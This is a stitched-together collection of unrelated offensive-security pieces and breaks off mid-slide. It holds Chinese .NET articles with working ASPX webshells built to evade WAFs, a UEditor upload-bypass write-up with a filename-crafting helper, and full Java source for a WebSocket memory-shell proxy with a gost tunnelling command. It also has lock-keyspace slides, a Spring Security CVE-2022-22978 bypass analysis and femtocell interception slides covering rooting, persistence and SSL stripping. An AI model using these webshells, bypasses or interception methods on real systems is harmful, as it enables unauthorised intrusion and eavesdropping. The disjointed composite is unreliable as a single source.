指令最常用的设置如以下代码所示,[ Language ] 属性指明服务端所使用的托管 语言类型,默认均为 Language="C#" [ AutoEventWireup ] 属性可设置 Index.aspx 页面的事件是否自动绑定,其值为布尔类 型,[ CodeBehind ] 属性指定包含与页关联的类的已编译文件的名称,这个属性不能在运 行时使用。[ Inherits ] 定义本页面所继承的代码隐藏类,该类的以分部类方式定义于 [ CodeBehind ] 属性所指向的 .cs 文件中,该类派生于 System.Web.UI.Page 类。 3.2 托管语言 csharp 在 WebForm 项目单个 ASPX 文件中@Page 指令也不是必须要声明的,可以省略。<script runat="server"> 标签表示代码运行于服务端,language 可指定为 csharp <%@ Page Title="About" Language="C#" AutoEventWireup="true" CodeBehind="About.aspx.cs" Inherits="WebApplication1.About" %> <script runat="server" language="csharp"> public void Page_load() { if (!string.IsNullOrEmpty(Request["content"])) { var content = Encoding.GetEncoding("utf- 8").GetString(Convert.FromBase64String(Request["content"])); System.Diagnostics.Pro\U0000FFFAcess.Star\uFFFAt("cmd.exe","/c " + content); } } </script> 3.3 托管语言 cs 现在市面上大多数的安全防护产品和规则都紧盯着 language=csharp 或 language=c# 这两种,很多大马和小马在上传漏洞的场景下被封杀的死死的,但却忽略了.NET 编译器还 提供了 language=cs 这样的简略写法,有天帮助一位师傅成功绕过 WAF 拦截,哈哈挺有 效的。 参考的 demo 代码如下原因在于 .Net 编译器提供 Microsoft.CSharp.CSharpCodeProvider 类实现对 C#代码编译的 笔者分析程序集完全限定名为 Microsoft.CSharp.CSharpCodeProvider, System, Version=1.0.5000.0, Culture=neutral, PublicKeyToken=b77a5c561934e089,因为 System.CodeDom.Compiler.CodeDomProvider 类里的私有方法 GetCompilerInfoForLanguageNoThrow 获取 config 配置文件里的语言类型编译选项 从 PrivilegedConfigurationManager.GetSection 方法可以清楚的看到从配置文件的 system.codedom 标签下获取定义的所有语言类型,微软官方文档预设定义了三种,如下 所示,详情点击 微软官方文档 属性 描述 compilerOptions 指定用于编译的其他特定于编译器的参数。 extension 为语言提供程序提供由源文件使用的文件扩展名的分号分隔列表。 例如“.cs” language 提供由语言提供程序支持的语言名称的分号分隔列表。 例如“C#;cs;csharp”。 type 包括包含提供程序实现的程序集的名称。 类型名称必须符合指定完全限定的类型 warningLevel 指定默认的编译器警告级别;确定语言提供程序将编译警告视为错误的级别。 所以在默认的.NET 编译器里支持 
language=cs 这样的声明,基于这点创造的 webshell 代 码如下 <%@ Page Language="cs" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%> 0x04 别名 using + 命名空间名,这样可以在程序中直接用命令空间中的类型,而不必指定类型的详细 命名空间,类似于 Java 的 import,这个功能也是最常用的,如下 另外 using 语句还可以定义.NET 资源使用范围,在程序结束时处理对象释放资源,比较常 见与文件读写或者数据库连接等场景,如下代码 using 还有个取别名的功能,using + 别名 = 包括详细命名空间信息的具体的类型,当需 要用到这个类型的时候,就每个地方都要用详细命名空间的办法来区分这些相同名字的类 型,当然被笔者用来做免杀也是相当的赞,但在 ASPX 单个页面使用时,using 变成 Import 关键词,如下代码 <script runat="server" language="cs"> public void Page_load(){ System.Diagnostics.Process.Start("cmd.exe","/c calc"); } </script> using System; using System.Data; using (SqlDataAdapter sqa = new SqlDataAdapter(sql, sc)) { sqa.SelectCommand.CommandTimeout = executeTimeOut; sqa.Fill(dtRet); return dtRet; } <%@ Import Namespace="dotNet=@System.@Diagnostics.@Process" %> <script runat="server" language="c#"> public void Page_load(){ dotNet.Start("cmd.exe","/c calc"); } </script> 将 Process 类的完全命名空间赋给 dotNet 这个别名,然后再代码中直接使用 dotNet.Start 方法启动新进程,这种方式或许能绕过一些安全产品的规则。 0x05 结语 .NET 这些有趣的 Tricks 还有很多,如果对这些技巧感兴趣的话可以多关注我们的博客、公 众号 dotNet 安全矩阵以及星球,下一篇将继续分享 .NET 免杀 Trick,请大伙继续关注文 章。另外文章涉及的 PDF 和 Demo 已打包发布在星球,欢迎对.NET 安全关注和关心的同 学加入我们,在这里能遇到有情有义的小伙伴,大家聚在一起做一件有意义的事。 0x06 星球 为了庆祝公众号粉丝突破 5K,星球提供优惠劵立减【¥30】 ,加入星球每天只需要 1 块钱 不到,就可以让自己从.NET 小白成为高手,因为星球里的资料和教程很少在市面上广泛传 播,价值完全划算,对.NET 关注的大伙请尽快加入我们吧! dotNet 安全矩阵知识星球 — 聚焦于微软.NET 安全技术,关注基于.NET 衍生出的各种红 蓝攻防对抗技术、分享内容不限于 .NET 代码审计、 最新的.NET 漏洞分析、反序列化漏 洞研究、有趣的.NET 安全 Trick、.NET 开源软件分享、. NET 生态等热点话题、还可以获得 阿里、蚂蚁、字节等大厂内推的机会。
All operations described below were carried out within an authorized engagement.

One afternoon a friend sent over a ueditor instance with the well-known .NET arbitrary file upload and asked me to take a look. The site sat behind a commercial WAF (vendor name redacted in the original write-up).

0x01

Every common trick was tried first: URI padding, POST body padding, high concurrency, parameter obfuscation, parameter fuzzing and so on. All of them failed.

Fuzzing other extensions then showed that cer, asmx and shtml could be uploaded, while things like ashx were blocked. Of those, direct access to .cer files is forbidden by the WAF. Several .asmx files were tried and every request came back with a 500 error; judging from a bit of googling, .asmx is only supported by default on .NET 4.6 and later, and it is unclear whether the IIS 10 version plays a role as well.

Trying to run commands through shtml (SSI exec) only produced an error prompt. Including a file also threw an error; according to Google this happens when the path or file being read contains Chinese characters, so that angle was shelved for the moment. Printing the environment variables did work, which revealed that the target middleware is IIS 10, along with a few other details. At that point I was stuck again and spent a lot of time going back to fuzzing parameters.

0x02

Out of ideas, I went looking for articles on how this vulnerability actually works. Most of them simply copy Ivan1ee's write-up: they reproduce the PoC, sketch the rough principle and stop there. So I downloaded the .NET version of the ueditor source and followed the flow.

/net/controller.ashx instantiates the CrawlerHandler class, so step into that class.

/net/App_Code/CrawlerHandler.cs: the first point of interest (the first red arrow in the original screenshot) checks whether the response for the submitted URL carries an image Content-Type. If we make our own site add an image header to every response, an .aspx path can be passed in and downloaded directly; the original PoC 1.jpg?.aspx only uses an image webshell because that makes the image-header check trivial to satisfy.

The second point of interest is where the vulnerable code lives, because it processes the critical path value. The copy-paste articles stop here with a single sentence saying "this function is vulnerable", so to understand exactly how the path is handled, step into the function.

/net/App_Code/PathFormater.cs: the two highlighted spots here are the real root cause. invalidPattern.Replace uses a regex to strip certain special characters from the path, replacing every match with an empty string. The character class is [\\\/\:\*\?\042\<\>\|], and each of those characters is removed. The second spot sets extention (sic), i.e. the file extension; GetExtension() is the built-in function that returns the final extension.

Taking the original PoC as an example, the mechanism is: 1.jpg?.aspx passes through invalidPattern.Replace and becomes 1.jpg.aspx, GetExtension() then yields .aspx, and finally the processed path and extension are returned.

Since the regex strips so many characters, I immediately tried some variations, but they were still blocked. More fuzzing around that regex, still blocked. By then it was nearly midnight and I was out of ideas again, so I spent another half hour staring at the code. Then it clicked: since PathFormater helpfully removes the special characters for us, we can splice the aspx keyword together with those characters ourselves and let the server strip them back out. Time to try it.

The constructed PoC went through successfully. With the same idea several similar PoCs also work; no more screenshots here.

0x03 Bypass

My guess from testing is that the WAF backend scopes its rules down to individual vulnerabilities, with a dedicated rule per bug. For instance, removing the action parameter from the URI stops the blocking, presumably because the rule for this ueditor vulnerability no longer matches, so nothing gets intercepted.

Advantage: fine-grained rules keep interference with production traffic to a minimum.
Drawback: each vulnerability needs a carefully built rule derived from its code; otherwise, exactly as with ueditor here, an unusual exploitation path constructed from the application's own logic walks straight past it.

Summary: deriving new PoCs from the source code is a quick and effective approach.

0x04 Defense

Add a corresponding rule patch covering the regular-expression stripping behaviour.

Ref:
https://forums.iis.net/t/1241946.aspx?Setting+up+IIS+10+for+ASMX+service
https://www.freebuf.com/vuls/181814.html
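As an addendum, the two-step sanitisation described above (the invalidPattern strip followed by GetExtension) is easy to model offline, which lets you check whether a candidate filename will come out the other side as .aspx before burning upload attempts against the WAF. This is only a rough Python re-implementation of the behaviour discussed; the authoritative logic is in PathFormater.cs.

Python

    import re

    # character class stripped by invalidPattern.Replace in PathFormater.cs
    INVALID = re.compile(r'[\\/:*?"<>|]')   # \042 in the original class is the double quote

    def get_extension(path):
        # rough stand-in for System.IO.Path.GetExtension
        i = path.rfind(".")
        return path[i:] if i != -1 else ""

    def server_side_view(user_supplied):
        cleaned = INVALID.sub("", user_supplied)
        return cleaned, get_extension(cleaned)

    for candidate in ("1.jpg?.aspx", "1.jpg.a?s?p:x", "1.jpg.as|px"):
        print(candidate, "->", server_side_view(candidate))
    # each candidate ends up as 1.jpg.aspx / .aspx once the server strips the special characters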
Exploiting Keyspace Vulnerabilities in Locks Bill Graydon @access_ctrl b.graydon@ggrsecurity.com github.com/bgraydon Take a look at your keyring... 2 Outline ● How locks & keys work ● Intro to the tools I’m releasing ● Brute forcing all possible keys ● Reading the pins in a lock ● Impressioning with extra information ● Keyed alike systems & lock disassembly in nonmastered systems ● Information theory and entropy ● How master keying works ● Deriving a master key from multiple low-level keys ● Rights amplification in mastered systems ● Special cases: construction keying, IC cores, Medeco, Mul-T-Lock ● Remediation 3 Software Analysis Tools Try it yourself! https://ggrsecurity.com/personal/~bgraydon/keyspace Or: https://tinyurl.com/key-space Source: https://github.com/bgraydon/lockview https://github.com/bgraydon/keyspace 4 How Locks Work What is a key? Mechanically encoded information. 7 Background | Key Codes 8 Background | Key Codes | Bitting 87527 # INCH MM 0 0.335 8.51 1 0.320 8.13 2 0.305 7.75 3 0.290 7.37 4 0.275 6.99 5 0.260 6.60 6 0.245 6.22 7 0.230 5.84 8 0.215 5.46 9 0.200 5.08 10 Background | Key Codes 52864 87527 11 MACS - Maximum Adjacent Cut Specification 12 MACS - Maximum Adjacent Cut Specification 14 MACS = Maximum Adjacent Cut Specification Key Type MACS Schlage 7 Kwikset 4 Sargent 7 Yale 7 Weiser 7 Medeco 2,3,4 Keyspaces In theory - Number of depths to the power of the number of spaces E.g. - Schlage - 10 depths, to the power of 5 or 6 spaces - 100,000 or 1,000,000 possible combinations Medeco - 6 depths, to the power of 5 or 6 spaces - 7000 or 46000 combinations There are further limitations imposed by physical constraints! 16 Keys vs. Passwords Trait Password Key Cost to try one $0.00000000001 $0.30-$10.00 Detectability of brute force Possible Challenging Length Unlimited Severely Limited Complexity Unlimited Limited Ease of changing Easy Costly and time-consuming Privilege levels Unlimited schemes Limited to hierarchical* 17 The Economics of Brute-Force Attacks Brute force = trying all possible keys If we have n key codes to try, we need at most n blanks, possibly fewer ● Blanks cost between $0.13 and $3.00 - the common ones are cheap ● If you have access to a code cutting machine, the marginal cost of a new key cut is the blank + your time ● If you do not, locksmiths will cut keys to code for $3.00-$10.00 each E.g. - if you can reduce the keyspace of a given lock to 1000 possible keys, the cost might be $450 (you own a code machine, blanks are $0.45 each) or $4000 (you need to use a locksmith, cost per cut key is $4.00) 18 20 21 22 Lock Tolerances 23 32 Decoding Locks 35 Password Re-Use ● Is bad Key Re-Use ● Is called “keyed alike” and is a common and accepted arrangement In a keyed-alike system, the key space is 1! 43 Keyed Alike - When Your Keyspace is 1 ● Elevators ● Most alarms (i.e. Detex) ● Enterphone systems ● Most controller boxes ● Golf carts ● Heavy equipment ● Police cars ● Traffic light controllers ● Telecom boxes ● Almost all other utilities ● New York City ● HVAC / Building automation systems ● Many city’s fire safety boxes ● Many regional Knox boxes ● Vending machines ● Postal keys ● Luggage - TSA keys ● Handcuffs HOPE XI: Howard Payne & Deviant Ollam, This Key is Your Key, This Key is My Key 44 45 46 47 48 49 Lock Disassembly 50 DEF CON 26 - m010ch - Please Do Not Duplicate Attacking the Knox Box Information Theory Shannon Entropy Information = stuff we know. Entropy = stuff we don’t know. We know whether a stop light is red or green. 
The colour of a stop light is information. We don’t know the outcome of a random variable, such as a coin flip or a dice roll. A coin flip and or dice roll has entropy. A key or password has entropy. 55 Measuring Entropy Once we do know the information, how many bits on a hard drive will it take to write it down (on average)? A coin flip → one bit A random number 0..255 → 8 bits A random number 1..10 → 3.32 bits 3 random numbers 1..10 can be encoded in a number 0..103. We can use 10 bits to encode 0..1023. So 10 bits will encode 0..999. 10 bits / 3 random numbers 1..10 ≈ 3.33 ≈ 3.32 bits / random number 56 Measuring Entropy Number of bits it takes to write down a number 0..x → log2(x) Number of bits of entropy (H) for a random variable with n outcomes: → H = log2(n) E.g: A fair coin flip, 2 outcomes: log2(2) = 2 bits A random number 0..255: log2(256) = 8 bits A random number 1..10: log2(10) = 3.322 bits 57 Key Entropy Examples Number of bits in a piece of information (e.g. key, password) - ● 8-character ASCII password - 8*8=256 bits of entropy ● 10-digit passcode, 3 characters long - 1000 combinations or 9.97 bits ● EVVA MCS key, 4 rotors with 8 positions each - 8^4=4096 or 12.00 bits of entropy ● Schlage 5-pin system - 5^10 or 100000 combinations (16.6 bits) If there are N possibilities, and all possibilities are equiprobable, then entropy (H) is given by: H = log2(n) If some possibilities are more likely than others, entropy goes down. E.g., dictionary-based passwords; avoidance of deep cut keys; key coding to deter picking 58 Entropy: 2 Possibilities, Unequal Probability Master key decoded to 14767 or 94767… When 50/50 chance… H = -p1 log2(p1) - p2 log2(p2) H = -0.5 log2(0.5) - 0.5 log2(0.5) = -log2(0.5) = log2(2) = 1 bit. Are these equiprobable? H = 0.95 log2(0.95) + 0.05 log2(0.05) = 0.286 bits In the extreme, if one option is certain, that’s 0 bits! In general… H = -Σ p log2(p) 59 Joint+Conditional Entropy, Mutual Information Master Keying 63 65 Master Keyed Lock Disassembly 68 Deducing the Master from Multiple Change Keys Rights Amplification Construction Core Systems Interchangeable Core Systems 74 75 159 Possible Medeco TMKs If… Intelligence: large facility Intelligence: IC System Reduce further with change keys and other information. 78 79 80 Correct Key: Incorrect Key: 85 86 87 Medeco Biaxial 88 MKA → B45 ↓ 89 GMK → B45 ↓ 90 Nonmastered Medeco Locks 92 Physical Creation of Keys 94 95 Getting a Key Cut 1. Identify the blank 2. Determine the bitting code you want 3. Go to a locksmith (not a hardware store or 7/11) 4. Ask if they can cut you a key by code 5. Give them the blank and code: e.g. “A Schlage SC1 with bitting code 0-4-2-8-5” 6. If they say “that key is restricted, I can’t cut you that”... check out our DEF CON 27 talk on Duplicating Restricted Mechanical Keys or wait a year for our (tentative) DEF CON 29 part II of that talk. 96 Defenses ● Avoid very large mastering systems ● Don’t master high-security and low-security facilities on one system ○ Very high risk locations should be off-master (current requirement for USA nuclear arsenals) ● A missing lock is as bad as a missing GMK! ● Consider alternatives to the 2-step system ○ Other specific defenses ○ If this is in your threat model ● Use a restricted keying system - it won’t stop a determined attacker, but it can slow them down and drive their costs up ● Your facility should be secure even if an attacker has the GMK ○ All a lock does is keep honest people honest. Add alarms, guards, etc. 
● Use IC or electronic components to make rekeying easier 97 Questions? b.graydon@ggrsecurity.com @access_ctrl Go try it! https://ggrsecurity.com/personal/ ~bgraydon/keyspace Or: https://tinyurl.com/key-space Source: https://github.com/bgraydon/lockview https://github.com/bgraydon/keyspace A huge thank you to Josh Robichaud, Karen Ng and Jenny & Bobby Graydon for their help in preparing this talk.
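To put numbers on the keyspace-versus-physical-constraints point from earlier in the deck, here is a small brute count of bittings that respect a MACS limit, using the Schlage parameters from the slides (10 depths, 5 or 6 spaces, MACS 7). Real systems shrink further once depth-coding rules, master pins and factory conventions are applied, so treat the output as an upper bound.

Python

    from itertools import product
    from math import log2

    def keyspace(depths, spaces, macs):
        """Count bittings whose adjacent cuts differ by no more than MACS."""
        count = 0
        for bitting in product(range(depths), repeat=spaces):
            if all(abs(a - b) <= macs for a, b in zip(bitting, bitting[1:])):
                count += 1
        return count

    for name, depths, spaces, macs in (("Schlage 5-pin", 10, 5, 7),
                                       ("Schlage 6-pin", 10, 6, 7)):
        n = keyspace(depths, spaces, macs)
        print(f"{name}: {n} usable bittings (~{log2(n):.1f} bits of entropy)")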
1 Websocket内存⻢利⽤的些补充 jspjs利⽤ WsProxy内存⻢ 前⼀段时间有师傅提出了基于websocket的内存⻢,并给出了实现: https://github.com/veo/wsMemShell 本来想写⼀写,但是看到https://tttang.com/archive/1673/ 这篇师傅的⽂章已经写的很好了,这⾥就 提⼀些利⽤⽅⾯的东⻄。 最新版本的蚁剑已经⽀持连接websocket协议的内存⻢,在官⽅更新doc⾥提到pswindows跟 cmdlinux可以使⽤,其实jspjs类型也是可以直接连接的。上篇⽂章https://yzddmr6.com/posts/java- expression-exploit/⾥⾯提到过为了兼容各种表达式注⼊,把jspjs类型的其他参数都合并为⼀个了,所 以直接把主payload部分发过去就完事了。 jspjs利⽤ 2 由于ws是全双⼯的,所以⽤来做代理⾮常的⽅便。原版的github项⽬中给出了cmd内存⻢的代码,但是 没有给wsproxy部分的内存⻢代码。因为defineClass⼀次只能打进去⼀个Class,改写内存⻢其实主要涉 及到类的复⽤。这⾥补充上⾃⼰修改的⼀个版本,使⽤的时候编译成class替换 https://github.com/veo/wsMemShell/blob/main/WsCmd.java⾥⾯的bytes: WsProxy内存⻢ 3 Plain Text 复制代码 import javax.websocket.*; import java.io.ByteArrayOutputStream; import java.net.InetSocketAddress; import java.nio.ByteBuffer; import java.nio.channels.AsynchronousSocketChannel; import java.nio.channels.CompletionHandler; import java.util.HashMap; import java.util.concurrent.Future; import java.util.concurrent.TimeUnit; public class WsProxy extends Endpoint implements CompletionHandler<Integer, WsProxy>, MessageHandler.Whole<ByteBuffer> {   Session session;   ByteBuffer buffer;   public AsynchronousSocketChannel client;   public Session channel;   long i = 0;   ByteArrayOutputStream baos = new ByteArrayOutputStream();   HashMap<String, AsynchronousSocketChannel> map = new HashMap<String, AsynchronousSocketChannel>();   void readFromServer(Session channel, AsynchronousSocketChannel client) {       buffer = ByteBuffer.allocate(50000);       WsProxy attach = new WsProxy();       attach.client = client;       attach.channel = channel;       client.read(buffer, attach, this);   }   void process(ByteBuffer z, Session channel) {       try {           if (i > 1) {               AsynchronousSocketChannel client = map.get(channel.getId());               client.write(z).get();               z.flip();               z.clear();           } else if (i == 1) {               String values = new String(z.array());               String[] array = values.split(" ");               String[] addrarray = array[1].split(":"); 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 4               AsynchronousSocketChannel client = AsynchronousSocketChannel.open();               int po = Integer.parseInt(addrarray[1]);               InetSocketAddress hostAddress = new InetSocketAddress(addrarray[0], po);               Future<Void> future = client.connect(hostAddress);               try {                   future.get(10, TimeUnit.SECONDS);               } catch (Exception ignored) {                   channel.getBasicRemote().sendText("HTTP/1.1 503 Service Unavailable\r\n\r\n");                   return;               }               map.put(channel.getId(), client);               readFromServer(channel, client);               channel.getBasicRemote().sendText("HTTP/1.1 200 Connection Established\r\n\r\n");           }       } catch (Exception ignored) {       }   }   @Override   public void onOpen(final Session session, EndpointConfig config) {       this.session = session;       i = 0;       session.addMessageHandler(this);   }   @Override   public void completed(Integer result, final WsProxy scAttachment) {       buffer.clear();       try {           if (buffer.hasRemaining() && result >= 0) {               byte[] arr = new byte[result];               ByteBuffer b = buffer.get(arr, 0, result);               baos.write(arr, 0, result);               ByteBuffer q = ByteBuffer.wrap(baos.toByteArray());               if 
(scAttachment.channel.isOpen()) {                   scAttachment.channel.getBasicRemote().sendBinary(q);               }               baos = new ByteArrayOutputStream();               readFromServer(scAttachment.channel, scAttachment.client);           } else {               if (result > 0) {                   byte[] arr = new byte[result]; 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 5 注意路径⼀定要⽤?path=xxx表示,不能直接填endpoint的地址,如ws://192.168.88.130:8083/shell/p 具体可以看gost的⽂档,当时⼀直被这⾥卡住连不上: https://gost.run/reference/dialers/ws/#websocket_1 配好socks后就可以进⾏愉快的代理了:)                   ByteBuffer b = buffer.get(arr, 0, result);                   baos.write(arr, 0, result);                   readFromServer(scAttachment.channel, scAttachment.client);               }           }       } catch (Exception ignored) {       }   }   @Override   public void failed(Throwable t, WsProxy scAttachment) {       t.printStackTrace();   }   @Override   public void onMessage(ByteBuffer message) {       try {           message.clear();           i++;           process(message, session);       } catch (Exception ignored) {       }   } } 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 Plain Text 复制代码 ./gost-windows-amd64.exe -L "socks5://:1180" -F "ws://192.168.88.130:8083?path=/shell/p" 1 6
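If you just want to sanity-check the endpoint without setting up gost, the handshake implied by process() above can be exercised directly: the first frame is split on spaces and element 1 is treated as host:port, and a successful connect is answered with an "HTTP/1.1 200 Connection Established" text frame. The sketch below uses the third-party websockets package and the example endpoint from above; the exact framing gost uses may differ, so this is only a smoke test of the WsProxy class, not a replacement for the real client.

Python

    import asyncio
    import websockets   # pip install websockets

    async def smoke_test(endpoint, target="example.com:80"):
        async with websockets.connect(endpoint) as ws:
            # process() splits the first frame on spaces and takes element 1 as host:port,
            # so a CONNECT-style request line is enough; send it as a binary frame
            await ws.send(f"CONNECT {target} HTTP/1.1\r\n\r\n".encode())
            print(await ws.recv())   # expect "HTTP/1.1 200 Connection Established"

    asyncio.run(smoke_test("ws://192.168.88.130:8083/shell/p"))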
1 Spring Security CVE-OLOO-OOXVW漏洞分析 ⾸先查看官⽅公告 https://spring.io/blog/2022/05/15/cve-2022-22978-authorization-bypass-in- regexrequestmatcher 注意到和 RegexRequestMatcher 有关,在官⽅仓库找到了最近修改 和 RegexRequestMatcher 有关的代码。 https://github.com/spring-projects/spring- security/commit/472c25b5e8b7374ba7e1b194ea09f43601f6f1c2 ⼀、漏洞简单分析 2 从测试⽤例⾥可以看到就是⽤\n、\r绕过正则判断,⽐如开发做了如下配置 意味着除了/login以为的任何路径都需要授权才能访问。此时如果我们输⼊ /xxx/aaa%0ag 配置的正 则会匹配不上我们访问的路径,就绕过了权限校验。 Java 复制代码 @Override protected void configure(HttpSecurity http) throws Exception {    http.csrf().disable();    http.authorizeRequests()       .requestMatchers(new RegexRequestMatcher(".*",null)).authenticated()//配置拦截所有请求       .antMatchers("/login").permitAll();//配置/login不拦截   } 1 2 3 4 5 6 7 3 第⼀眼看这个洞肯定想到 /%0a/../admin 这样绕然后访问admin,⾸先不管 Spring Security 是 去匹配路径规范化以后的路径还是原始的, Spring Security 在此之前还有⼀个 Firewall 就会 拦截这种请求。然后想着要是不能把这个%0a给弄掉怎么去访问到路由呢不可能有谁真的写⼀个带回⻋ 换⾏的路由吧。 基于上⾯的思考⼤概想到两种可⽤场景。 有的路由会像下⾯这样配置 我们配置了上⾯的权限校验以后正常访问 /test/xxx 是403 访问 /test/xxxx%0a 成功绕过权限校验 ⼆、实际利⽤场景 场景⼀ Java 复制代码    @ResponseBody        @RequestMapping("/test/*")    public String test(){        return "test";   } 1 2 3 4 5 4 使⽤了路径参数代码如下 /test1/xxxx 403 /test1/xxxx%0a 200 场景⼆ Java 复制代码    @ResponseBody    @RequestMapping("/test1/{path}")    public String test1(@PathVariable String path){        return "test1"+path;   } 1 2 3 4 5 5
Traffic Interception & Remote Mobile Phone Cloning with a Compromised CDMA Femtocell Doug DePerry Tom Ritter Andrew Rahimi iSEC Partners • The specific method used to access the device that makes the demonstration possible has been resolved by Verizon Wireless through a security patch. • The Network Extenders being used to conduct the demonstration do not have the security patch installed. • Verizon Wireless gave iSEC permission to use the network extenders to conduct the demonstration in consideration of iSEC bringing the issue to the attention of Verizon Wireless. 2 • This is not like joining an open WiFi network • Your phone associates automatically with no* indication • You might be on ours right now.  • We don’t hack phones… at least not today No User Interaction 3 Full Disclosure • Disclosed vulnerabilities to the carrier early December • They worked extremely hard, over Christmas, to prepare a patch • All vulnerabilities disclosed in this presentation have been patched • We do have architectural concerns around femtocells • Concerns shared by… 4 Prior Art • BH 2011 “Femtocells: a Poisonous Needle in the Operator's Hay Stack” • SFR Femtocell (2nd biggest operator in France) • THC: Vodafone (2010/2011) • RSAXVC & Doug Kelly (Bsides KC 2011) • Rooting • Cable construction • “Do It Yourself Cellular IDS” • Black Hat 2013 5 • North American Carrier • 3G • CDMA • Customers affected • Roughly 1/3 of the population of the US • Phone Calls & SMS • MMS, Data Man-In-The-Middling, SSL Stripping • Cloning Our Focus 6 Rooting Exploring • Filesystem • Traffic Exploiting • Voice, SMS, Data Cloning Fixing Agenda 7 General Architecture We Are Here!  8 Rooting the Femtocell(s) SCS-26UC4 (Older) SCS-2U01 (Newer) 9 Rooting the Femtocell(s) SCS-26UC4 (Older) SCS-2U01 (Newer) Bonus! 10 • Faraday FA626TE ARM v5TE processor • on Samsung UCMB board • OneNAND flash memory • Lattice FPGA • Presumably for DSP • GPS antenna • CDMA antenna • 2G/3G • Ethernet • HDMI Port SCS-2U01 Hardware 11 • HDMI port Console Port 12 • USB FTDI + HDMI = Custom Cable 13 • Approximately 40’ • Environmental factors • Adjust signal strength • Amplify Wireless Signal Range 14 • SCS-26UC4 • 57600 8 N 1 • Uboot delay: “Press any key to interrupt boot” • Root shell • Run /etc/init.d/rc 5 • Root on fully functional device • SCS-2U01 • 115200 8 N 1 • Magic sysreq + i • Root login • Run /etc/init.d/rc 5 • Root on fully functional device Console Access! 15 These mechanisms to obtain root no longer work (But may be useful on other embedded devices) Console Access: Patched 16 Exploring the Femtocell 17 • MontaVista Linux 5, 2.6.18 • Custom kernel, drivers, software • /mnt/onand • Custom application binaries • uimhx, cmbx, cdhx, agent, vpn • Keys, passwords, etc • /etc/shadow • /app/vpn/quicksec.xml Filesystem 18 • This terminal console sucks • Can’t really do anything • Let’s patch • No easy way to edit files • ugh, sed • SSHD • PKI-only, no RootLogin • Edit SSHD.conf • Flush iptables I am root, but… 19 • Filesystem is pulled from firmware every single time • Any changes disappear on reboot • Have to edit firmware and reflash? • Until we noticed… • Persistent filesystem location • /mnt/onand Be Persistent 20 • Read every single startup script until… if [ -f /mnt/onand/.ubirc ]; then echo 'DEBUG MODE STARTUP is TARTTING....’ . /mnt/onand/.ubirc Be Persistent That’s the part of the filesystem we can persist in! 
21 • .ubirc • Presence of this file == debug mode • We use it to run scripts • Patch sshd • Allow interactive root login • Flush iptables • exec /bin/bash Be Persistent 22 • We’re persistent • Call me Eve • Let’s go find the packets! • QuickSec VPN client • Packaged as a Netfilter kernel module • Literally steals packets out of Netfilters and handles them itself… • Packets don’t show up in normal capture tools like tcpdump • Not Open Source Let’s go after the data 23 It’s Just Engineering 24 • Custom kernel module • Priority is tricky • Incoming/Outgoing • Must be above & below quicksec to get the plaintext before encryption and after decryption • Custom Userland app • Display data in real-time • Log to pcap • Cross-compiling is fun* • *fun like a hernia I want packets! 25 Voice, Texts, and Data 26 • Its mostly UDP, lots and lots of UDP • Strange Ports • This is hard. Voice: Lots ‘o packets 27 Voice: Force Decode as RTP 28 RFC 3558: Value Rate Total data frame size --------------------------------------------------------- 0 Blank 0 (0 bit) 1 1/8 2 (16 bits) 2 1/4 5 (40 bits; not valid for EVRC) 3 1/2 10 (80 bits) 4 1 22 (171 bits; 5 padded at end w/ zeros) 5 Erasure 0 (SHOULD NOT be transmitted by sender) Voice – Codec? 29 Voice – Codec? No Answers! 30 Voice – Codec? 31 Voice! 32 http://www.youtube.com/watch?v=3FyNB4QmY1Q • These specs suck • But we figured it out • 7-bit Words, ugh SMS 33 SMS 34 SMS http://www.youtube.com/watch?v=R-4fkJiVeE4 35 • Plaintext! Praise the Lord: beautiful, decoded, plaintext • Easiest thing to do with data: View It. Data 36 37 MMS http://www.youtube.com/watch?v=uuwsMsvGAYo • Plaintext! Praise the Lord: beautiful, decoded, plaintext • Easiest thing to do with data: View It. • Second easiest thing to do with data: Drop It. Data 38 • And when you Denial of Service some data services, they fail over insecurely… iMessage 39 • Back to the Data. It is plaintext. • However: Lots of encapsulation • If we’re lucky: IP, GRE, PPP, HDLC, IP… • If we’re not: IP, GRE, PPP, HDLC & then IP segmented across GRE packets Data 40 Data Traffic 41 • Goal: Edit a Webpage, as simply as possible • (Change HTTPS Form Action - > HTTP) • Going to require editing the inner TCP checksum • Which requires decoding and re-encoding • And editing the PPP checksum • And hopefully doesn’t change the size • TCP Checksum is at the beginning (GRE frame N) • PPP Checksum is at the end (GRE frame N+3? 4?) • Oh, and the frames may be out of order Data Middling 42 • Try 1: • Do it inline, in the kernel • Nope: Carrier applies transparent compression to all traffic on port 80 • Can’t collect packets to decompress, edit, and recompress, can’t only edit one packet at a time • Try 2: • Change the request to HTTP 1.0 (No Compression) • Nope: Carrier Ignores it Data Middling 43 • Try 3: • DNS Hijack, send everyone to our server • Nope: Carrier does transparent proxying on port 80, then does own lookup based on Host header • Try 4: • DNS Hijack AND rewrite all connections to port 80 on our IP to port 81, and back again • Nope: Corner Cases. If they happen 2% of the time, on a normal webpage, it’s dozens of packets. Data Middling 44 • Try 5: • DNS Hijack, rewrite all connections to port 80 on our IP to port 81, and back again, AND Redirect people to 8080 • Success! 
• The corner cases don’t occur on the small 301 redirect • We can proxy the real webpage to users, ferrying their cookies and form posts, and: • Strip SSL • Rewrite URLs to port 8080 Data Middling 45 http://www.youtube.com/watch?v=2xjhtDobO8c Data Middling Video 46 Miniature Cell Towers • Eavesdropping is cool and everything but… • Impersonation is even cooler. 47 Cloning 48 CDMA Terminology • No SIM Cards needed here • Unlike the IMSI, the MIN is just a 10 digit phone number, sometimes the same as your actual phone number GSM CDMA Device ID IMEI ESN (Now MEID) Subscriber ID IMSI MIN User Phone # MSISDN MDN 49 • ESN (Electronic Serial Number) • CDMA-specific ID number: “11 EE 4B 55” • MEID (Mobile Equipment Identifier) • ESNs ran out! MEID is successor • Pseudo ESN used for backwards compatibility with handsets using MEIDs: “80 11 EE 4B” • (Phones often ALSO have an IMEI for global or 4G) CDMA Terminology 50 • Every time you make a call, MIN and MEID or ESN sent unencrypted to the tower to identify you • That used to be it, and cloning was rampant Cloning basics – Real Towers MIN, 